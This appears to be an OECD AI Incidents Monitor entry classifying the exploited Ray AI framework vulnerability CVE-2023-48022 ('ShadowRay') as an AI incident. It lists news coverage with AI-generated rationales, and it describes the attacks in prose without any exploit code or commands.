Critical Unpatched Ray AI Framework Vulnerability Exploited in Widespread Attacks

Thumbnail Image

The information displayed in the AIM should not be reported as representing the official views of the OECD or of its member countries.

A critical, unpatched vulnerability (CVE-2023-48022) in the Ray AI framework has been actively exploited for at least seven months, allowing attackers to access sensitive data, hijack compute resources, and execute arbitrary code across thousands of companies. The flaw remains disputed and unpatched, leading to significant breaches and misuse of AI workloads.[AI generated]

Why's our monitor labelling this an incident or hazard?

The Ray framework is an AI-related system used for scaling AI and Python workloads. The exploitation of its vulnerabilities by hackers has directly led to breaches and theft of sensitive data, including AI models and credentials, which is a clear harm to property and potentially to communities dependent on these systems. The active exploitation and resulting damage meet the criteria for an AI Incident, as the AI system's malfunction and security flaws have directly caused harm.[AI generated]
AI principles
AccountabilityRobustness & digital securityPrivacy & data governanceSafetyRespect of human rights

Industries
IT infrastructure and hostingDigital security

Affected stakeholders
Business

Harm types
Economic/PropertyReputationalHuman or fundamental rights

Severity
AI incident

Business function:
Research and development

AI system task:
Other


Articles about this incident or hazard

Thumbnail Image

Ray framework flaw exploited for hackers to breach servers

2024-03-27
TechRadar
Why's our monitor labelling this an incident or hazard?
The Ray framework is an AI-related system used for scaling AI and Python workloads. The exploitation of its vulnerabilities by hackers has directly led to breaches and theft of sensitive data, including AI models and credentials, which is a clear harm to property and potentially to communities dependent on these systems. The active exploitation and resulting damage meet the criteria for an AI Incident, as the AI system's malfunction and security flaws have directly caused harm.
Thumbnail Image

Hackers Breached Hundreds Of Companies' AI Servers, Researchers Say

2024-03-26
Forbes
Why's our monitor labelling this an incident or hazard?
The event involves an AI system (Ray) used to run AI workloads, which was exploited due to insecure configurations allowing remote code execution without authentication. This exploitation led to direct harm: unauthorized use of computational resources (cryptocurrency mining), potential breaches of sensitive tokens including payment services, and long-term compromise of AI infrastructure. The harm includes disruption of AI operations, potential financial theft, and violation of security and privacy rights. The AI system's role is pivotal as the vulnerability is inherent in the AI infrastructure software and its deployment. Hence, this is an AI Incident rather than a hazard or complementary information.
Thumbnail Image

Unpatched flaw in Anyscale's Ray AI framework under attack | TechTa...

2024-03-27
TechTarget
Why's our monitor labelling this an incident or hazard?
The event involves an AI system (Ray AI framework) with a critical vulnerability that is actively exploited, leading to unauthorized remote code execution and data breaches. This exploitation has caused harm to property and organizational assets, fulfilling the criteria for an AI Incident. The involvement of the AI system's development and use (specifically, the unpatched flaw in its Jobs API) is central to the harm. Although the vendor disputes the vulnerability, independent researchers confirm active exploitation and harm, which is sufficient to classify this as an AI Incident rather than a hazard or complementary information.
Thumbnail Image

Thousands of servers hacked in ongoing attack targeting Ray AI framework

2024-03-27
Ars Technica
Why's our monitor labelling this an incident or hazard?
The event involves a known AI system (Ray framework) used for AI workloads. The attackers exploited a vulnerability in this AI system's Jobs API to gain unauthorized access, tamper with AI models, and steal credentials. These actions have directly led to harm including corruption of AI models (harm to property and AI integrity), unauthorized access to sensitive data (violation of rights and security), and installation of malicious software. The harm is realized and ongoing, not merely potential. Hence, it meets the criteria for an AI Incident as the AI system's use and malfunction (vulnerability exploitation) directly caused significant harm.
Thumbnail Image

'ShadowRay' vulnerability on Ray framework exposes thousands of AI workloads, compute power and data

2024-03-27
VentureBeat
Why's our monitor labelling this an incident or hazard?
The Ray framework is an AI system used to run and scale AI workloads, including large language models. The described vulnerability directly results from a lack of authorization in the Ray Jobs API, allowing attackers to execute arbitrary code and access sensitive data. This exploitation has already caused harm by compromising data confidentiality, misusing computing resources, and potentially enabling further malicious activities. Therefore, the event meets the criteria of an AI Incident, as the AI system's malfunction and exploitation have directly led to significant harm to property (computing resources), data confidentiality, and potentially to organizations relying on these AI workloads.
Thumbnail Image

'Thousands' of firms vulnerable to security bug in Ray AI

2024-03-27
TheRegister.com
Why's our monitor labelling this an incident or hazard?
The event involves an AI system (Ray AI framework) whose design decision leads to a critical security vulnerability. The vulnerability is actively exploited, causing direct harm such as data breaches, unauthorized access, and resource misuse. These harms fall under violations of rights and harm to property. Therefore, this qualifies as an AI Incident because the AI system's use and design directly led to realized harms.
Thumbnail Image

Massive hack hits AI servers, exploits Ray framework vulnerability

2024-03-28
ReadWrite
Why's our monitor labelling this an incident or hazard?
The Ray framework is an AI system used for scaling AI workloads. The exploitation of its vulnerability has directly led to unauthorized access, data leaks, and misuse of expensive AI computing resources (GPUs). These outcomes represent realized harms including breach of data confidentiality (a violation of rights) and harm to property (compromised servers and resources). Therefore, this event qualifies as an AI Incident due to the direct harm caused by the AI system's malfunction (security flaw) and its exploitation.
Thumbnail Image

Hundreds of Clusters Attacked Due to Unpatched Flaw in Ray AI Framework

2024-03-28
Security Boulevard
Why's our monitor labelling this an incident or hazard?
The event involves an AI system (the Ray AI framework) whose unpatched security flaw has been actively exploited, resulting in direct harm: unauthorized access to sensitive data, compromised AI production workloads, and misuse of compute resources. The attackers' ability to run arbitrary code and persist in systems indicates a malfunction or misuse of the AI system's deployment environment. The harm includes breaches of data confidentiality, disruption of AI infrastructure, and potential broader impacts on companies relying on these AI workloads. Therefore, this qualifies as an AI Incident because the AI system's use and security flaw have directly led to significant harm.
Thumbnail Image

Flaw in Ray AI framework potentially leaks sensitive data of workloads

2024-03-26
SC Media
Why's our monitor labelling this an incident or hazard?
The article explicitly mentions an AI system (Ray AI framework) being exploited through a critical vulnerability, leading to data leaks and compromise of AI workloads. The harm includes unauthorized data access, potential model tampering, and remote code execution, which are direct harms to property and organizational security. The exploitation is ongoing and has affected thousands of companies, confirming realized harm. Hence, this is an AI Incident as per the definitions provided.